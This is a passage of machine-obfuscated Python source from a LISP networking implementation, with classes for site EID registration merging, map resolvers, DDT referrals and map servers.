if 77 - 77: I11i . IiII / OoO0O00 / I1Ii111
def print_flags ( self , html ) :
if ( html == False ) :
oOo0OOoooO = "{}-{}-{}-{}-{}-{}-{}" . format ( "P" if self . proxy_reply_requested else "p" ,
# ooOoO0o
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_register_ttl_requested else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node_requested else "m" ,
"N" if self . map_notify_requested else "n" )
else :
OO0oOooo = self . print_flags ( False )
OO0oOooo = OO0oOooo . split ( "-" )
oOo0OOoooO = ""
for I11IIo0oOooO0O in OO0oOooo :
iiiIIi1 = lisp_site_flags [ I11IIo0oOooO0O . upper ( ) ]
iiiIIi1 = iiiIIi1 . format ( "" if I11IIo0oOooO0O . isupper ( ) else "not " )
oOo0OOoooO += lisp_span ( I11IIo0oOooO0O , iiiIIi1 )
if ( I11IIo0oOooO0O . lower ( ) != "n" ) : oOo0OOoooO += "-"
if 35 - 35: o0oOOo0O0Ooo + I11i % O0 % iII111i * I11i + O0
if 11 - 11: OoOoOO00 - I1Ii111 / OOooOOo
return ( oOo0OOoooO )
if 12 - 12: IiII + OoO0O00
if 18 - 18: I1Ii111 / OoooooooOO
def copy_state_to_parent ( self , child ) :
self . xtr_id = child . xtr_id
self . site_id = child . site_id
self . first_registered = child . first_registered
self . last_registered = child . last_registered
self . last_registerer = child . last_registerer
self . register_ttl = child . register_ttl
if ( self . registered == False ) :
self . first_registered = lisp_get_timestamp ( )
if 77 - 77: oO0o % I11i + i1IIi + Oo0Ooo + I1Ii111 + OoO0O00
self . auth_sha1_or_sha2 = child . auth_sha1_or_sha2
self . registered = child . registered
self . proxy_reply_requested = child . proxy_reply_requested
self . lisp_sec_present = child . lisp_sec_present
self . xtr_id_present = child . xtr_id_present
self . use_register_ttl_requested = child . use_register_ttl_requested
self . merge_register_requested = child . merge_register_requested
self . mobile_node_requested = child . mobile_node_requested
self . map_notify_requested = child . map_notify_requested
if 78 - 78: O0 . oO0o
if 72 - 72: O0 - IiII
def build_sort_key ( self ) :
I111i1iI = lisp_cache ( )
iiii11I1 , III = I111i1iI . build_key ( self . eid )
OOo00OO = ""
if ( self . group . is_null ( ) == False ) :
Oo0O0O , OOo00OO = I111i1iI . build_key ( self . group )
OOo00OO = "-" + OOo00OO [ 0 : 12 ] + "-" + str ( Oo0O0O ) + "-" + OOo00OO [ 12 : : ]
if 52 - 52: i11iIiiIii + i11iIiiIii - i1IIi . i11iIiiIii - ooOoO0o + OoooooooOO
III = III [ 0 : 12 ] + "-" + str ( iiii11I1 ) + "-" + III [ 12 : : ] + OOo00OO
del ( I111i1iI )
return ( III )
if 50 - 50: OoooooooOO . OoOoOO00 * o0oOOo0O0Ooo / O0 % I1IiiI + Oo0Ooo
if 75 - 75: OoO0O00 * Oo0Ooo . OOooOOo . OoO0O00 * Oo0Ooo * iIii1I11I1II1
def merge_in_site_eid ( self , child ) :
IIII1II1 = False
if ( self . group . is_null ( ) ) :
self . merge_rlocs_in_site_eid ( )
else :
IIII1II1 = self . merge_rles_in_site_eid ( )
if 10 - 10: OoooooooOO . I11i / I1Ii111 % i11iIiiIii % iIii1I11I1II1
if 65 - 65: IiII % OOooOOo / o0oOOo0O0Ooo * II111iiii - oO0o
if 38 - 38: I1Ii111 * o0oOOo0O0Ooo
if 32 - 32: iII111i / Ii1I / I1Ii111 - OoOoOO00 / OOooOOo * OoO0O00
if 32 - 32: I1ii11iIi11i + ooOoO0o . i1IIi * iIii1I11I1II1 - I1IiiI
if 9 - 9: I11i % i1IIi / ooOoO0o % iII111i - oO0o - II111iiii
if ( child != None ) :
self . copy_state_to_parent ( child )
self . map_registers_received += 1
if 29 - 29: ooOoO0o . II111iiii . i1IIi % oO0o
return ( IIII1II1 )
if 11 - 11: OoOoOO00 . OoO0O00 % I11i * iII111i % I1Ii111 . O0
if 17 - 17: OOooOOo / i11iIiiIii - i11iIiiIii . II111iiii . ooOoO0o
def copy_rloc_records ( self ) :
IIiiiIiI = [ ]
for OOOoOoo in self . registered_rlocs :
IIiiiIiI . append ( copy . deepcopy ( OOOoOoo ) )
if 16 - 16: OoO0O00 . Oo0Ooo + oO0o + Ii1I - OoooooooOO . ooOoO0o
return ( IIiiiIiI )
if 44 - 44: O0
if 91 - 91: ooOoO0o * OoOoOO00 * i1IIi * o0oOOo0O0Ooo - ooOoO0o % Ii1I
def merge_rlocs_in_site_eid ( self ) :
self . registered_rlocs = [ ]
for i1iI11i in list ( self . individual_registrations . values ( ) ) :
if ( self . site_id != i1iI11i . site_id ) : continue
if ( i1iI11i . registered == False ) : continue
self . registered_rlocs += i1iI11i . copy_rloc_records ( )
if 46 - 46: O0 / iIii1I11I1II1
if 65 - 65: OOooOOo
if 88 - 88: OOooOOo * iIii1I11I1II1 + I11i . iII111i
if 55 - 55: I1IiiI + Ii1I % I1ii11iIi11i + iIii1I11I1II1
if 64 - 64: i1IIi / O0 - oO0o
if 7 - 7: IiII . IiII * Ii1I
IIiiiIiI = [ ]
for OOOoOoo in self . registered_rlocs :
if ( OOOoOoo . rloc . is_null ( ) or len ( IIiiiIiI ) == 0 ) :
IIiiiIiI . append ( OOOoOoo )
continue
if 1 - 1: i11iIiiIii
for OOiIII1 in IIiiiIiI :
if ( OOiIII1 . rloc . is_null ( ) ) : continue
if ( OOOoOoo . rloc . is_exact_match ( OOiIII1 . rloc ) ) : break
if 20 - 20: o0oOOo0O0Ooo . I1Ii111 + O0
if ( OOiIII1 == IIiiiIiI [ - 1 ] ) : IIiiiIiI . append ( OOOoOoo )
if 99 - 99: O0 / IiII . oO0o
self . registered_rlocs = IIiiiIiI
if 18 - 18: OoooooooOO * OoO0O00 * I1Ii111
if 12 - 12: i11iIiiIii / iIii1I11I1II1 . I11i % I1Ii111 * ooOoO0o % ooOoO0o
if 13 - 13: i1IIi . ooOoO0o . ooOoO0o
if 24 - 24: iIii1I11I1II1
if ( len ( self . registered_rlocs ) == 0 ) : self . registered = False
return
if 72 - 72: i11iIiiIii + o0oOOo0O0Ooo % ooOoO0o * I1ii11iIi11i . i1IIi
if 59 - 59: OoooooooOO - OoooooooOO - o0oOOo0O0Ooo + i1IIi % I1Ii111
def merge_rles_in_site_eid ( self ) :
if 74 - 74: IiII * iIii1I11I1II1 - I1IiiI
if 62 - 62: o0oOOo0O0Ooo
if 54 - 54: iIii1I11I1II1 / OoooooooOO + o0oOOo0O0Ooo . i1IIi - OoooooooOO
if 70 - 70: Ii1I / OoOoOO00 * Oo0Ooo
I1oo00O0 = { }
for OOOoOoo in self . registered_rlocs :
if ( OOOoOoo . rle == None ) : continue
for iIIi in OOOoOoo . rle . rle_nodes :
IiI = iIIi . address . print_address_no_iid ( )
I1oo00O0 [ IiI ] = iIIi . address
if 5 - 5: OoooooooOO % I1ii11iIi11i - I1Ii111
break
if 28 - 28: OOooOOo
if 87 - 87: o0oOOo0O0Ooo - Ii1I + I11i
if 69 - 69: iII111i . Ii1I * OoOoOO00 / OoOoOO00 / OoOoOO00 + OoOoOO00
if 17 - 17: I1ii11iIi11i * OoOoOO00 + II111iiii
if 28 - 28: iIii1I11I1II1 % Oo0Ooo * I1Ii111 - IiII / OoO0O00 * OoooooooOO
self . merge_rlocs_in_site_eid ( )
if 88 - 88: O0
if 15 - 15: Oo0Ooo % I11i * O0
if 61 - 61: I1ii11iIi11i - ooOoO0o / OoOoOO00 % OOooOOo * i1IIi . IiII
if 27 - 27: I1ii11iIi11i % iII111i . Oo0Ooo * iIii1I11I1II1
if 40 - 40: I11i
if 58 - 58: o0oOOo0O0Ooo / OOooOOo . oO0o % ooOoO0o
if 33 - 33: I1IiiI * I1ii11iIi11i . OoO0O00 - I1Ii111 . OoO0O00
if 79 - 79: ooOoO0o
oo0OOo0Oo = [ ]
for OOOoOoo in self . registered_rlocs :
if ( self . registered_rlocs . index ( OOOoOoo ) == 0 ) :
oo0OOo0Oo . append ( OOOoOoo )
continue
if 15 - 15: ooOoO0o + I1ii11iIi11i / I1IiiI - Oo0Ooo - Ii1I / I11i
if ( OOOoOoo . rle == None ) : oo0OOo0Oo . append ( OOOoOoo )
if 37 - 37: ooOoO0o / II111iiii . OOooOOo % iIii1I11I1II1 - Oo0Ooo - Ii1I
self . registered_rlocs = oo0OOo0Oo
if 47 - 47: I1ii11iIi11i
if 26 - 26: iII111i
if 55 - 55: I1ii11iIi11i . ooOoO0o * Oo0Ooo + I1Ii111
if 59 - 59: iII111i - OOooOOo - OoO0O00 . I1IiiI % o0oOOo0O0Ooo + iII111i
if 10 - 10: iIii1I11I1II1 - Ii1I
if 84 - 84: iII111i
if 21 - 21: i11iIiiIii
ooo0o0O = lisp_rle ( "" )
iIi1i1I = { }
oOo = None
for i1iI11i in list ( self . individual_registrations . values ( ) ) :
if ( i1iI11i . registered == False ) : continue
iiI11Ii11iiI = i1iI11i . registered_rlocs [ 0 ] . rle
if ( iiI11Ii11iiI == None ) : continue
if 66 - 66: IiII
oOo = i1iI11i . registered_rlocs [ 0 ] . rloc_name
for oOo0o0 in iiI11Ii11iiI . rle_nodes :
IiI = oOo0o0 . address . print_address_no_iid ( )
if ( IiI in iIi1i1I ) : break
if 9 - 9: I1ii11iIi11i + OoooooooOO - OoooooooOO + OoO0O00 / iIii1I11I1II1
iIIi = lisp_rle_node ( )
iIIi . address . copy_address ( oOo0o0 . address )
iIIi . level = oOo0o0 . level
iIIi . rloc_name = oOo
ooo0o0O . rle_nodes . append ( iIIi )
iIi1i1I [ IiI ] = oOo0o0 . address
if 23 - 23: iII111i / iIii1I11I1II1
if 5 - 5: O0
if 64 - 64: i1IIi * i1IIi . iII111i - O0 - oO0o % OoooooooOO
if 14 - 14: Ii1I % OoO0O00 % I1Ii111 * O0
if 8 - 8: I1IiiI - i11iIiiIii * I1IiiI
if 6 - 6: O0 - OoOoOO00 - i11iIiiIii / iII111i
if ( len ( ooo0o0O . rle_nodes ) == 0 ) : ooo0o0O = None
if ( len ( self . registered_rlocs ) != 0 ) :
self . registered_rlocs [ 0 ] . rle = ooo0o0O
if ( oOo ) : self . registered_rlocs [ 0 ] . rloc_name = None
if 63 - 63: OOooOOo
if 84 - 84: i11iIiiIii * iIii1I11I1II1 % I11i % iII111i + OoooooooOO . o0oOOo0O0Ooo
if 78 - 78: o0oOOo0O0Ooo . iII111i + O0 / I1ii11iIi11i + I1ii11iIi11i + II111iiii
if 96 - 96: iIii1I11I1II1 * II111iiii . iIii1I11I1II1
if 13 - 13: Ii1I - OoOoOO00 . Ii1I
if ( list ( I1oo00O0 . keys ( ) ) == list ( iIi1i1I . keys ( ) ) ) : return ( False )
if 7 - 7: Ii1I - I11i / I1ii11iIi11i + iII111i
lprint ( "{} {} from {} to {}" . format ( green ( self . print_eid_tuple ( ) , False ) , bold ( "RLE change" , False ) ,
# ooOoO0o * I1IiiI % IiII
list ( I1oo00O0 . keys ( ) ) , list ( iIi1i1I . keys ( ) ) ) )
if 62 - 62: OoooooooOO . OoooooooOO / I11i % OoOoOO00
return ( True )
if 2 - 2: IiII % I1ii11iIi11i * OoO0O00 + Oo0Ooo * iII111i
if 85 - 85: OOooOOo * I1IiiI - iIii1I11I1II1 - OoOoOO00 + ooOoO0o . OoO0O00
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . add_cache ( self . eid , self )
else :
ooOO00o = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( ooOO00o == None ) :
ooOO00o = lisp_site_eid ( self . site )
ooOO00o . eid . copy_address ( self . group )
ooOO00o . group . copy_address ( self . group )
lisp_sites_by_eid . add_cache ( self . group , ooOO00o )
if 46 - 46: OoO0O00 * I1Ii111 . O0
if 86 - 86: i11iIiiIii . Ii1I / OoOoOO00 / I11i * i1IIi
if 40 - 40: o0oOOo0O0Ooo
if 33 - 33: i11iIiiIii + I1Ii111 % I1ii11iIi11i - I1Ii111 * OoO0O00
if 1 - 1: II111iiii / I1IiiI + II111iiii % II111iiii - I1Ii111
ooOO00o . parent_for_more_specifics = self . parent_for_more_specifics
if 24 - 24: I11i / Oo0Ooo / i1IIi + IiII
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( ooOO00o . group )
ooOO00o . add_source_entry ( self )
if 10 - 10: I11i - IiII / II111iiii / oO0o % O0 / I1Ii111
if 91 - 91: oO0o * OoOoOO00 + O0 % Oo0Ooo
if 62 - 62: iIii1I11I1II1 - i11iIiiIii % iIii1I11I1II1 . ooOoO0o / OOooOOo * OoOoOO00
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . delete_cache ( self . eid )
else :
ooOO00o = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( ooOO00o == None ) : return
if 45 - 45: OOooOOo - OOooOOo % iII111i - IiII . O0
i1iI11i = ooOO00o . lookup_source_cache ( self . eid , True )
if ( i1iI11i == None ) : return
if 6 - 6: iIii1I11I1II1 * II111iiii / O0 % IiII - I1Ii111
if ( ooOO00o . source_cache == None ) : return
if 64 - 64: ooOoO0o
ooOO00o . source_cache . delete_cache ( self . eid )
if ( ooOO00o . source_cache . cache_size ( ) == 0 ) :
lisp_sites_by_eid . delete_cache ( self . group )
if 28 - 28: i11iIiiIii - IiII * I1ii11iIi11i + IiII * iII111i
if 75 - 75: o0oOOo0O0Ooo * OoOoOO00 % I1ii11iIi11i + OOooOOo . II111iiii
if 12 - 12: ooOoO0o
if 83 - 83: I1Ii111 % ooOoO0o + OoooooooOO
def add_source_entry ( self , source_se ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_se . eid , source_se )
if 50 - 50: i11iIiiIii % I1IiiI * iII111i / Ii1I
if 12 - 12: iII111i / OoO0O00 - II111iiii + Oo0Ooo
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 78 - 78: i1IIi
if 25 - 25: Ii1I * II111iiii / OoOoOO00
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
if 86 - 86: i1IIi + I1IiiI + I1Ii111 % II111iiii . IiII - iIii1I11I1II1
if 54 - 54: i11iIiiIii . Ii1I % I1IiiI . I1Ii111 . OoooooooOO
def eid_record_matches ( self , eid_record ) :
if ( self . eid . is_exact_match ( eid_record . eid ) == False ) : return ( False )
if ( eid_record . group . is_null ( ) ) : return ( True )
return ( eid_record . group . is_exact_match ( self . group ) )
if 49 - 49: OOooOOo % I11i - OOooOOo + Ii1I . I1ii11iIi11i + ooOoO0o
if 15 - 15: i11iIiiIii
def inherit_from_ams_parent ( self ) :
O0oOoO00O = self . parent_for_more_specifics
if ( O0oOoO00O == None ) : return
self . force_proxy_reply = O0oOoO00O . force_proxy_reply
self . force_nat_proxy_reply = O0oOoO00O . force_nat_proxy_reply
self . force_ttl = O0oOoO00O . force_ttl
self . pitr_proxy_reply_drop = O0oOoO00O . pitr_proxy_reply_drop
self . proxy_reply_action = O0oOoO00O . proxy_reply_action
self . echo_nonce_capable = O0oOoO00O . echo_nonce_capable
self . policy = O0oOoO00O . policy
self . require_signature = O0oOoO00O . require_signature
self . encrypt_json = O0oOoO00O . encrypt_json
if 85 - 85: I1Ii111 + iII111i - oO0o
if 59 - 59: IiII . oO0o / i11iIiiIii . I1Ii111
def rtrs_in_rloc_set ( self ) :
for OOOoOoo in self . registered_rlocs :
if ( OOOoOoo . is_rtr ( ) ) : return ( True )
if 64 - 64: OoOoOO00
return ( False )
if 20 - 20: OoOoOO00 / O0 * OOooOOo % I11i + OoO0O00 + o0oOOo0O0Ooo
if 51 - 51: Ii1I - OoOoOO00 / i11iIiiIii + O0
def is_rtr_in_rloc_set ( self , rtr_rloc ) :
for OOOoOoo in self . registered_rlocs :
if ( OOOoOoo . rloc . is_exact_match ( rtr_rloc ) == False ) : continue
if ( OOOoOoo . is_rtr ( ) ) : return ( True )
if 71 - 71: ooOoO0o
return ( False )
if 35 - 35: OoOoOO00
if 55 - 55: iII111i - o0oOOo0O0Ooo + IiII * II111iiii
def is_rloc_in_rloc_set ( self , rloc ) :
for OOOoOoo in self . registered_rlocs :
if ( OOOoOoo . rle ) :
for ooo0o0O in OOOoOoo . rle . rle_nodes :
if ( ooo0o0O . address . is_exact_match ( rloc ) ) : return ( True )
if 6 - 6: I1Ii111 / i1IIi / IiII . o0oOOo0O0Ooo
if 69 - 69: ooOoO0o - OoOoOO00 . I1IiiI . I11i + OoOoOO00 / i11iIiiIii
if ( OOOoOoo . rloc . is_exact_match ( rloc ) ) : return ( True )
if 20 - 20: OoO0O00 . OoooooooOO - ooOoO0o . I11i / Oo0Ooo
return ( False )
if 89 - 89: iIii1I11I1II1 . ooOoO0o
if 82 - 82: OoOoOO00 - II111iiii . OoO0O00 * ooOoO0o
def do_rloc_sets_match ( self , prev_rloc_set ) :
if ( len ( self . registered_rlocs ) != len ( prev_rloc_set ) ) : return ( False )
if 78 - 78: OoOoOO00 % oO0o
for OOOoOoo in prev_rloc_set :
ii1II1i1 = OOOoOoo . rloc
if ( self . is_rloc_in_rloc_set ( ii1II1i1 ) == False ) : return ( False )
if 39 - 39: iIii1I11I1II1
return ( True )
if 72 - 72: II111iiii + I1Ii111 / Ii1I * iIii1I11I1II1
if 95 - 95: OoooooooOO + OOooOOo + II111iiii + IiII + OoO0O00
if 86 - 86: II111iiii / iII111i - I1ii11iIi11i
class lisp_mr ( object ) :
def __init__ ( self , addr_str , dns_name , mr_name ) :
self . mr_name = mr_name if ( mr_name != None ) else "all"
self . dns_name = dns_name
self . map_resolver = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( addr_str ) :
self . map_resolver . store_address ( addr_str )
self . insert_mr ( )
else :
self . resolve_dns_name ( )
if 65 - 65: I1ii11iIi11i + OoOoOO00
self . last_used = 0
self . last_reply = 0
self . last_nonce = 0
self . map_requests_sent = 0
self . neg_map_replies_received = 0
self . total_rtt = 0
if 43 - 43: O0 + I11i % II111iiii
if 56 - 56: IiII + Oo0Ooo . IiII % iIii1I11I1II1 % ooOoO0o % ooOoO0o
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
if 70 - 70: ooOoO0o / i1IIi - I11i - i11iIiiIii
try :
ooo0o0 = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
OO0oo0o0 = ooo0o0 [ 2 ]
except :
return
if 8 - 8: oO0o . OoO0O00 / IiII - oO0o / OoOoOO00 - i1IIi
if 48 - 48: OoooooooOO + II111iiii
if 46 - 46: I1IiiI - II111iiii * OoO0O00 % OoooooooOO / OoO0O00 + II111iiii
if 92 - 92: OoOoOO00 - iIii1I11I1II1
if 10 - 10: iII111i - I1IiiI / I1ii11iIi11i - i1IIi - II111iiii % i11iIiiIii
if 2 - 2: ooOoO0o % ooOoO0o
if ( len ( OO0oo0o0 ) <= self . a_record_index ) :
self . delete_mr ( )
return
if 94 - 94: ooOoO0o / OoooooooOO * i1IIi . Oo0Ooo * i11iIiiIii
if 5 - 5: iIii1I11I1II1 / oO0o - Oo0Ooo - I1IiiI + iIii1I11I1II1
IiI = OO0oo0o0 [ self . a_record_index ]
if ( IiI != self . map_resolver . print_address_no_iid ( ) ) :
self . delete_mr ( )
self . map_resolver . store_address ( IiI )
self . insert_mr ( )
if 63 - 63: iIii1I11I1II1 / ooOoO0o + O0 - o0oOOo0O0Ooo
if 31 - 31: Ii1I
if 76 - 76: OoO0O00 / II111iiii
if 92 - 92: o0oOOo0O0Ooo . i1IIi . OoOoOO00 / OoO0O00 % Ii1I
if 61 - 61: i1IIi / Ii1I . OoOoOO00 + i11iIiiIii
if 69 - 69: i11iIiiIii - iIii1I11I1II1
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
if 40 - 40: I1IiiI / oO0o + ooOoO0o
for IiI in OO0oo0o0 [ 1 : : ] :
OO0O00o0 = lisp_address ( LISP_AFI_NONE , IiI , 0 , 0 )
iii1i = lisp_get_map_resolver ( OO0O00o0 , None )
if ( iii1i != None and iii1i . a_record_index == OO0oo0o0 . index ( IiI ) ) :
continue
if 100 - 100: OoOoOO00 % iII111i * ooOoO0o . O0
iii1i = lisp_mr ( IiI , None , None )
iii1i . a_record_index = OO0oo0o0 . index ( IiI )
iii1i . dns_name = self . dns_name
iii1i . last_dns_resolve = lisp_get_timestamp ( )
if 37 - 37: I1ii11iIi11i
if 24 - 24: O0 . I1Ii111 * i11iIiiIii
if 84 - 84: ooOoO0o / I1ii11iIi11i - o0oOOo0O0Ooo . OoooooooOO * iIii1I11I1II1
if 16 - 16: I11i % O0
if 56 - 56: Ii1I * OoOoOO00 . i1IIi
iIi1II1IiI1I = [ ]
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
if ( self . dns_name != iii1i . dns_name ) : continue
OO0O00o0 = iii1i . map_resolver . print_address_no_iid ( )
if ( OO0O00o0 in OO0oo0o0 ) : continue
iIi1II1IiI1I . append ( iii1i )
if 28 - 28: iII111i
for iii1i in iIi1II1IiI1I : iii1i . delete_mr ( )
if 18 - 18: I1Ii111
if 29 - 29: i1IIi - I1IiiI / i1IIi
def insert_mr ( self ) :
III = self . mr_name + self . map_resolver . print_address ( )
lisp_map_resolvers_list [ III ] = self
if 64 - 64: IiII
if 69 - 69: OOooOOo . I1IiiI
def delete_mr ( self ) :
III = self . mr_name + self . map_resolver . print_address ( )
if ( III not in lisp_map_resolvers_list ) : return
lisp_map_resolvers_list . pop ( III )
if 11 - 11: I1Ii111 * I1IiiI - I1Ii111 / iII111i
if 22 - 22: iII111i % I11i % O0 - I11i
if 71 - 71: I1Ii111 / II111iiii - OoooooooOO % i1IIi + OoOoOO00 % OoooooooOO
class lisp_ddt_root ( object ) :
def __init__ ( self ) :
self . root_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . priority = 0
self . weight = 0
if 52 - 52: Ii1I . OoOoOO00 / o0oOOo0O0Ooo / iII111i
if 83 - 83: OoO0O00 - Oo0Ooo + I1Ii111 . I1IiiI
if 78 - 78: I11i / ooOoO0o . OoOoOO00 * i1IIi
class lisp_referral ( object ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_set = { }
self . referral_type = LISP_DDT_ACTION_NULL
self . referral_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_ttl = 0
self . uptime = lisp_get_timestamp ( )
self . expires = 0
self . source_cache = None
if 15 - 15: i1IIi . II111iiii * OoOoOO00 / Oo0Ooo
if 99 - 99: iII111i - o0oOOo0O0Ooo / O0
def print_referral ( self , eid_indent , referral_indent ) :
oo0Ooo0o00OO = lisp_print_elapsed ( self . uptime )
ii1iIi = lisp_print_future ( self . expires )
lprint ( "{}Referral EID {}, uptime/expires {}/{}, {} referrals:" . format ( eid_indent , green ( self . eid . print_prefix ( ) , False ) , oo0Ooo0o00OO ,
# Ii1I * Oo0Ooo / oO0o / Ii1I
ii1iIi , len ( self . referral_set ) ) )
if 34 - 34: I1IiiI
for oooO00ooo00 in list ( self . referral_set . values ( ) ) :
oooO00ooo00 . print_ref_node ( referral_indent )
if 56 - 56: Ii1I
if 71 - 71: O0 / i1IIi
if 20 - 20: OOooOOo . iIii1I11I1II1 - I1Ii111 . i1IIi
def print_referral_type ( self ) :
if ( self . eid . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( "root" )
if ( self . referral_type == LISP_DDT_ACTION_NULL ) :
return ( "null-referral" )
if 82 - 82: oO0o * i11iIiiIii % o0oOOo0O0Ooo % IiII - I11i - OoO0O00
if ( self . referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
return ( "no-site-action" )
if 24 - 24: oO0o . II111iiii + OoO0O00 * I1ii11iIi11i / oO0o
if ( self . referral_type > LISP_DDT_ACTION_MAX ) :
return ( "invalid-action" )
if 86 - 86: I1Ii111 + I1ii11iIi11i
return ( lisp_map_referral_action_string [ self . referral_type ] )
if 63 - 63: ooOoO0o - i11iIiiIii . o0oOOo0O0Ooo - i1IIi - IiII
if 32 - 32: I1Ii111 / iIii1I11I1II1 + oO0o % I11i * OoooooooOO
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 69 - 69: OOooOOo
if 9 - 9: i11iIiiIii * Oo0Ooo
def print_ttl ( self ) :
O0O00O = self . referral_ttl
if ( O0O00O < 60 ) : return ( str ( O0O00O ) + " secs" )
if 33 - 33: oO0o / ooOoO0o
if ( ( O0O00O % 60 ) == 0 ) :
O0O00O = str ( old_div ( O0O00O , 60 ) ) + " mins"
else :
O0O00O = str ( O0O00O ) + " secs"
if 92 - 92: O0 . Oo0Ooo - Ii1I * I1IiiI * Oo0Ooo * iII111i
return ( O0O00O )
if 78 - 78: Ii1I * iIii1I11I1II1 - Ii1I - I1ii11iIi11i * I1ii11iIi11i
if 44 - 44: o0oOOo0O0Ooo
def is_referral_negative ( self ) :
return ( self . referral_type in ( LISP_DDT_ACTION_MS_NOT_REG , LISP_DDT_ACTION_DELEGATION_HOLE ,
# OoOoOO00
LISP_DDT_ACTION_NOT_AUTH ) )
if 20 - 20: i11iIiiIii
if 2 - 2: o0oOOo0O0Ooo % OOooOOo * O0 * OOooOOo
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . add_cache ( self . eid , self )
else :
O0oO0 = lisp_referral_cache . lookup_cache ( self . group , True )
if ( O0oO0 == None ) :
O0oO0 = lisp_referral ( )
O0oO0 . eid . copy_address ( self . group )
O0oO0 . group . copy_address ( self . group )
lisp_referral_cache . add_cache ( self . group , O0oO0 )
if 27 - 27: IiII . Oo0Ooo . I1ii11iIi11i
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( O0oO0 . group )
O0oO0 . add_source_entry ( self )
if 53 - 53: Ii1I / i11iIiiIii - I11i * OoooooooOO
if 88 - 88: OoO0O00 / Ii1I + ooOoO0o . iIii1I11I1II1 * ooOoO0o
if 56 - 56: o0oOOo0O0Ooo / iII111i . O0 % O0
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . delete_cache ( self . eid )
else :
O0oO0 = lisp_referral_cache . lookup_cache ( self . group , True )
if ( O0oO0 == None ) : return
if 37 - 37: I1Ii111
o000oOoO = O0oO0 . lookup_source_cache ( self . eid , True )
if ( o000oOoO == None ) : return
if 98 - 98: iII111i - OoOoOO00 / I1Ii111 . OOooOOo - OOooOOo - ooOoO0o
O0oO0 . source_cache . delete_cache ( self . eid )
if ( O0oO0 . source_cache . cache_size ( ) == 0 ) :
lisp_referral_cache . delete_cache ( self . group )
if 84 - 84: OOooOOo * ooOoO0o / O0
if 96 - 96: I11i . I11i % II111iiii
if 14 - 14: iII111i / OoooooooOO
if 8 - 8: OOooOOo + I1IiiI - Oo0Ooo + i1IIi . Ii1I . I1Ii111
def add_source_entry ( self , source_ref ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ref . eid , source_ref )
if 38 - 38: I1IiiI / II111iiii * OoOoOO00 / I1Ii111
if 80 - 80: I1ii11iIi11i / ooOoO0o * ooOoO0o . Oo0Ooo
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 44 - 44: Ii1I * i1IIi % OoOoOO00 . OoOoOO00
if 16 - 16: Oo0Ooo / i1IIi / iIii1I11I1II1 / iIii1I11I1II1 % o0oOOo0O0Ooo / I1ii11iIi11i
if 11 - 11: I1IiiI
class lisp_referral_node ( object ) :
def __init__ ( self ) :
self . referral_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . priority = 0
self . weight = 0
self . updown = True
self . map_requests_sent = 0
self . no_responses = 0
self . uptime = lisp_get_timestamp ( )
if 45 - 45: OOooOOo / i1IIi * IiII * I1Ii111
if 34 - 34: ooOoO0o / iIii1I11I1II1 . iII111i
def print_ref_node ( self , indent ) :
i1 = lisp_print_elapsed ( self . uptime )
lprint ( "{}referral {}, uptime {}, {}, priority/weight: {}/{}" . format ( indent , red ( self . referral_address . print_address ( ) , False ) , i1 ,
# OoO0O00 . iIii1I11I1II1 . ooOoO0o - IiII . iII111i + Ii1I
"up" if self . updown else "down" , self . priority , self . weight ) )
if 76 - 76: Ii1I . oO0o . Oo0Ooo
if 13 - 13: iIii1I11I1II1 / o0oOOo0O0Ooo
if 24 - 24: I1Ii111 % OOooOOo * i1IIi - iIii1I11I1II1
class lisp_ms ( object ) :
def __init__ ( self , addr_str , dns_name , ms_name , alg_id , key_id , pw , pr ,
mr , rr , wmn , site_id , ekey_id , ekey ) :
self . ms_name = ms_name if ( ms_name != None ) else "all"
self . dns_name = dns_name
self . map_server = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( lisp_map_servers_list == { } ) :
self . xtr_id = lisp_get_control_nonce ( )
else :
self . xtr_id = list ( lisp_map_servers_list . values ( ) ) [ 0 ] . xtr_id
if 61 - 61: o0oOOo0O0Ooo + Ii1I
self . alg_id = alg_id
self . key_id = key_id
self . password = pw
self . proxy_reply = pr
self . merge_registrations = mr
self . refresh_registrations = rr
self . want_map_notify = wmn
self . site_id = site_id
self . map_registers_sent = 0
self . map_registers_multicast_sent = 0
self . map_notifies_received = 0
self . map_notify_acks_sent = 0
